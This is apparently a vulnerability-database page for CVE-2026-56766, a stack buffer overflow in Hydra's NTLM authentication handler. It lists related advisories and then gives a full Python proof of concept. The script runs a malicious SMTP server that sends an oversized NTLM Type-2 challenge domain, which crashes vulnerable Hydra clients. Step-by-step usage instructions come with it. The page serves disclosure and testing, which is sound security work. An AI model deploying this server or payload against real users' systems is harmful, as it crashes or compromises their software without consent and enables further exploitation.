| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2026-56766 | 25 Jun 202618:01 | – | attackerkb | |
| CVE-2026-56766 | 25 Jun 202623:34 | – | circl | |
| CVE-2026-56766 | 25 Jun 202618:01 | – | cve | |
| CVE-2026-56766 Hydra - Stack Buffer Overflow in NTLM Authentication Handler | 25 Jun 202618:01 | – | cvelist | |
| EUVD-2026-39515 | 25 Jun 202618:01 | – | euvd | |
| CVE-2026-56766 | 25 Jun 202619:16 | – | nvd | |
| hydra-9.7+git20.gbccaea1-1.1 on GA media (moderate) | 28 Jun 202600:00 | – | opensuse | |
| OPENSUSE-SU-2026:11131-1 hydra-9.7+git20.gbccaea1-1.1 on GA media | 27 Jun 202600:00 | – | osv | |
| UBUNTU-CVE-2026-56766 | 25 Jun 202619:16 | – | osv | |
| 📄 Hydra Stack Buffer Overflow | 7 Jul 202600:00 | – | packetstorm |
# Exploit Title: Hydra - Stack Buffer Overflow
# CVE: CVE-2026-56766
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/vanhauser-thc/thc-hydra
# Software Link: https://github.com/vanhauser-thc/thc-hydra
# Affected: Hydra <= 9.7
# Tested on: Hydra 9.5 (Ubuntu 22.04)
# Category: Remote
# Platform: Linux
# Exploit Type: Stack Buffer Overflow
# CVSS: 7.5
# Description: Malicious NTLM Type-2 challenge with excessively long domain
# causes stack buffer overflow in Hydra's NTLM authentication handler
# (SMTP, POP3, IMAP, etc. modules).
# Fixed in: https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Notes:
# • Run this PoC server first, then launch vulnerable Hydra against it.
# • Triggers SIGSEGV in vulnerable versions.
#
# How to Use
#
# Step 1: Run the exploit server: python3 exploit.py
# Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")
import socket
import base64
import struct
import threading
import time
import sys
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE_2 = 2
def create_ntlm_type2_challenge():
challenge = bytearray(NTLMSSP_SIGNATURE)
challenge += struct.pack("<I", NTLM_TYPE_2)
domain_name = b"A" * 400
domain_len = len(domain_name)
flags = 0x00008201
server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
reserved = b"\x00" * 8
target_name_offset = 48
challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
challenge += struct.pack("<I", flags)
challenge += server_challenge
challenge += reserved
challenge += b"\x00" * 8
challenge += domain_name
return challenge
class SMTPServer:
def __init__(self, host='0.0.0.0', port=2525):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def handle_client(self, client, addr):
client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
while True:
try:
data = client.recv(4096).decode('utf-8', errors='ignore').strip()
if not data:
break
if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
elif data.upper().startswith("AUTH NTLM"):
client.send(b"334 NTLM\r\n")
elif len(data) > 10:
type2 = create_ntlm_type2_challenge()
b64_type2 = base64.b64encode(type2).decode('ascii')
client.send(f"334 {b64_type2}\r\n".encode())
time.sleep(1)
client.recv(8192)
client.send(b"235 Authentication successful (fake)\r\n")
break
elif data.upper().startswith("QUIT"):
client.send(b"221 Bye\r\n")
break
except:
break
client.close()
def start(self):
self.sock.bind((self.host, self.port))
self.sock.listen(5)
print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
while True:
client, addr = self.sock.accept()
threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()
if __name__ == "__main__":
banner()
try:
server = SMTPServer()
server.start()
except KeyboardInterrupt:
print("\n[+] Server stopped")
except Exception as e:
print(f"[-] Error: {e}")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation